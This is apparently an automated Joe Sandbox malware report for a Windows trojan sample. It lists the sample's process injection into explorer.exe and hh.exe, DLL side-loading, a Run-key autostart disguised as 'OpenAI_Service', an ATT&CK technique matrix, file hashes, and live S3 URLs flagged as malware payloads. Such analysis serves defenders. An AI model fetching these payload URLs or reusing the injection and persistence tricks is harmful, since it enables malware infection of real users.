Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 28_2_00007FF8BFB74628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8BFB74628
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory allocated: C:\Windows\hh.exe base: 1CDCB5B0000 protect: page read and write
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory allocated: C:\Windows\explorer.exe base: 1230000 protect: page read and write
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; NtMapViewOfSection: Indirect: 0x7FF7F9818C91
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; NtMapViewOfSection: Indirect: 0x7FF7F98191CE
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; NtUnmapViewOfSection: Indirect: 0x7FF7F9819162
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory written: PID: 1028 base: 3050000 value: E8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory written: PID: 1028 base: 1230000 value: 00
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Thread register set: target process: 5780
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory written: C:\Windows\hh.exe base: 1CDCB5B0000
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory written: C:\Windows\explorer.exe base: 3050000
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Memory written: C:\Windows\explorer.exe base: 1230000
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Process created: C:\Windows\hh.exe C:\windows\hh.exe
Source: hh.exe, 00000007.00000002.4591567895.000001CDCB7CF000.00000004.00000020.00020000.00000000.sdmp, hh.exe, 00000007.00000002.4591567895.000001CDCB748000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 0 minProgram Manager
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000002.2585674966.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.00000000046BF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.4591125608.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4597563509.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000003.3869237698.0000000004789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.0000000004789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2602666332.0000000004789000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Progman_
Source: explorer.exe, 0000000B.00000000.2551931305.0000000001731000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.2551388655.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2581630998.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PProgman
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,5_2_00007FF8B910F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,5_2_00007FF8B90E9B90
Source: C:\Windows\hh.exe; Code function: gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,26_2_00007FF8A937F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,26_2_00007FF8A9359B90
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,28_2_00007FF8A802F930
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,28_2_00007FF8A8009B90
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Queries volume information: C:\Users\user\Desktop\VJQyKuHEUe.exe VolumeInformation
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe; Code function: 5_2_00007FF7F974DD10 GetSystemTimeAsFileTime,5_2_00007FF7F974DD10
Source: C:\Windows\hh.exe; Code function: 7_2_000001CDCB921F88 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,7_2_000001CDCB921F88
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.10.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr; Binary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 2 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 2 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Windows Service | 1 Abuse Elevation Control Mechanism | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 412 Process Injection | 2 Obfuscated Files or Information | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Scheduled Task/Job | 1 Software Packing | LSA Secrets | 1 Query Registry | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 Timestomp | Cached Domain Credentials | 351 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 151 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 151 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 412 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph] ID: 1577406; Sample: VJQyKuHEUe.exe; Start date: 18/12/2024; Architecture: WINDOWS; Score: 100

Source | Detection | Scanner | Label | Link
VJQyKuHEUe.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
VJQyKuHEUe.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\MSVCP140.dll | 0% | ReversingLabs | |
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\VCRUNTIME140.dll | 0% | ReversingLabs | |
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.raw | 24% | ReversingLabs | Win64.Trojan.DllHijack |
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\vcruntime140_1.dll | 0% | ReversingLabs | |
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dlld | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngd | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png | 100% | Avira URL Cloud | malware |
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dlld | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe | 0% | Avira URL Cloud | safe |
https://www.battle.net/shop/simplecheckout/navbar | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/view.png | 100% | Avira URL Cloud | malware |
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngd | 0% | Avira URL Cloud | safe |
https://www.battle.net/shop/simplecheckout/error | 0% | Avira URL Cloud | safe |
https://www.battle.net/shop/simplecheckout/debug-harness | 0% | Avira URL Cloud | safe |
https://www.battle.net/shop/simplecheckout/error?error= | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dlld | 0% | Avira URL Cloud | safe |
http://s3-r-w.ap-east-1.amazonaws.comd | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll | 100% | Avira URL Cloud | malware |
https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh | 0% | Avira URL Cloud | safe |
https://word.office.comz | 0% | Avira URL Cloud | safe |
http://anydesk17.s3.ap-east-1.amazonaws.comd | 0% | Avira URL Cloud | safe |
https://www.battle.net/shop/simplecheckout/loading | 0% | Avira URL Cloud | safe |
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dlld | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-r-w.ap-east-1.amazonaws.com | 3.5.237.31 | true | false | | high
anydesk17.s3.ap-east-1.amazonaws.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png | true | Avira URL Cloud: malware | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll | false | Avira URL Cloud: safe | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll | false | Avira URL Cloud: safe | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/view.png | true | Avira URL Cloud: malware | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll | false | Avira URL Cloud: safe | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe | false | Avira URL Cloud: safe | unknown
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                              high
                                              https://wns.windows.com/)sexplorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
3.5.239.146 | unknown | United States | 16509 | AMAZON-02US | false
27.50.63.8 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
52.95.161.33 | unknown | United States | 16509 | AMAZON-02US | false
3.5.238.183 | unknown | United States | 16509 | AMAZON-02US | false
3.5.237.31 | s3-r-w.ap-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577406
                                                Start date and time:2024-12-18 13:04:39 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 13m 57s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:35
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:VJQyKuHEUe.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0.exe
                                                Detection:MAL
                                                Classification:mal100.evad.winEXE@23/25@5/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 35
                                                • Number of non-executed functions: 338
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.218.208.109, 13.107.246.63, 20.12.23.50, 2.16.158.91, 20.190.177.82, 2.16.158.50
                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                • Report size getting too big, too many NtOpenKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: VJQyKuHEUe.exe
Time | Type | Description
07:05:46 | API Interceptor | 248x Sleep call for process: VJQyKuHEUe.exe modified
07:06:23 | API Interceptor | 1639x Sleep call for process: explorer.exe modified
07:06:54 | API Interceptor | 3399455x Sleep call for process: hh.exe modified
13:06:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
13:06:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.8487509662971519
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:n8MGdswhM1y/fhQXIDcQ1c6xPcEScw3AGSMSy+HbHgnoW6He6yoVa0SKLnGS5SgK:8MGdA0794ajgizuiFKZ24lO87
                                                                                              MD5:D17FBA6ED8C6AF0F51A8A4A8906407E5
                                                                                              SHA1:D4AFBE75ABDC999398122D145D29384306D75C3A
                                                                                              SHA-256:558FAA761D6E1B59EFE2D416F89729DB48726492C49636CCDD563AE1CD340B47
                                                                                              SHA-512:E2CA236644E46E15D0CBE64E0144D04B461279E4F84A2374511631C7029C554E84E8A94A09D94FC6DA33BDB4656E4EB2567F6ED3CC14F845B1553A435A4DA990
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.8143862519948792
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:sGhGdswhM1y/fhQXIDcQyc6lzcE0cw3l0SMSy+HbHgnoW6He6yoVa0SKLnGS5Sgo:LGdA0MZzepTjgIzuiFKZ24lO87
                                                                                              MD5:F56E0E86C3FA4597CAA2287A711BD2B6
                                                                                              SHA1:450EA5DDEEC0315A358AC5A42F2CA2DD732DD3DB
                                                                                              SHA-256:6B40175127C9EDA0C7FAA8470BE014048D9DD8CF900B7C1FFB008C42D283972F
                                                                                              SHA-512:88719E35FE018AB18FC7DB7A556E1000A51E5C6EEBDA12FEAAA0F6B22C6EDD52C3C1FEC8F4280C3D6E17F4B137566EF0DFECBF89DA900CEC9212F8E844DA158A
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:19 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):59720
                                                                                              Entropy (8bit):1.6882843120225532
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5I88lJcrTNKcsqOe10TWp6P/zi7/6DTtxjMgBLiTkuGTgstV/0QyvpJpDembB5xw:Jj6rejA/zOC/v05GTgGsp1XtwS+h
                                                                                              MD5:BA1EA70810BDA9757ADEAE3D48511BD3
                                                                                              SHA1:8C08C4C09A6582AB68CA5BFA29809EF1E27D43D7
                                                                                              SHA-256:D18B60B0F5BF6E5AA836B916E246B440BC74822FA5F9C873B5A61D07EBCD84D2
                                                                                              SHA-512:43A868DE8805095149A0752EF9D33EAFFEA5D15DCFF423E4D72A4AAF42A098D69CA1A1A20854CB8BB7047A0640B42D5B25B4CD3D1A715AC924D7863481A2B773
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8492
                                                                                              Entropy (8bit):3.691847802179193
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJ+WpE26YAiXgmfteslipBRv89bh1kform:R6lXJ3pE26Y9XgmfteHQhGfJ
                                                                                              MD5:DA1C49740DACB45F7D8F2B10B63C65F3
                                                                                              SHA1:1E9045C23668B08F883A18B375DDF5E1F1402162
                                                                                              SHA-256:69262F9D66BCC7A68027B00AAF64304FAF591A40B01C5C9ED3663C699956264D
                                                                                              SHA-512:7E7AF4EFA57E402651D7ADE650E187D5A9795D4605A8399FA8418D1EF53C6B383BEEDCE2C02B87271F7A1061AA930F05B580D720DF9E5FBAE3C331EEE2993A6F
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):4.425463514110702
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsEtJg771I9s/WpW8VYlYm8M4JB0KtFymyq85zVKulXyfd:uIjfEHI7fu7VRJ23mQJVyfd
                                                                                              MD5:E54A8235EF3585BF074B95900DDBB321
                                                                                              SHA1:243737723E2084F193000AE27144362CC7DB07B0
                                                                                              SHA-256:FF3E024F917F884A9D0BB5C019D45CA4CD4B157B7F60D3CC98C22B0441B72C13
                                                                                              SHA-512:346B1A4B73A134A1AF1E878B58CA0627F8A367B9DC38B495170082893FC8539A5C5B39E12E628C8FF889ABAB9EFD4892BB3BE88352C66EB1AB1589CED3ACC13E
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:23 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):36336
                                                                                              Entropy (8bit):2.2996016815375953
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:NVkIKOmllOCXhZsiWpz/U3CtlWcuXpxKe21bFj:/02CXhz0Uyk5xKegBj
                                                                                              MD5:8FBA0A5D492E6EA6E59CC1E49D4CAA7D
                                                                                              SHA1:8E3A6DE7E9E51041F8DEC66AEA28823C57A84CC5
                                                                                              SHA-256:3DB047206EB7456A6B6C8CDDA2FD49FE45541B39D35012DB7AE994CAD35990E2
                                                                                              SHA-512:EB8836555E11DA57D0CA740610BDF7AE5C3B7F2BE9A531F6DD6BFD2DC93B248E53E9CFDFECED56AA6D79AC6106BEEC6CE991C7126F3E8499680DE91ECB67C3EE
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):6488
                                                                                              Entropy (8bit):3.709069947997313
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:RSIU6o7wVetb+4eUYte9uxIZ5aMOUT89bPA1DZf0m9mm:R6l7wVeJ+4eUYte5pBT89b411f0mom
                                                                                              MD5:3E0BCB1C6118BC9F81E685E39ADA0150
                                                                                              SHA1:7262B0A35C7D56C6D2AF8A56795EB43D3A79D360
                                                                                              SHA-256:D40B0165429BD94F37C3C39D8315FF2EEF4C569778730CACFC4C5726F6D91072
                                                                                              SHA-512:8C615796384CBED82AEF897276C46A08811AB5C9B49F2577834C6099C3011E19972335048F812E25C91ECDCF8A8AA9C0C544BE65313DE6CBEDA19847B86FBED2
                                                                                              Malicious:false
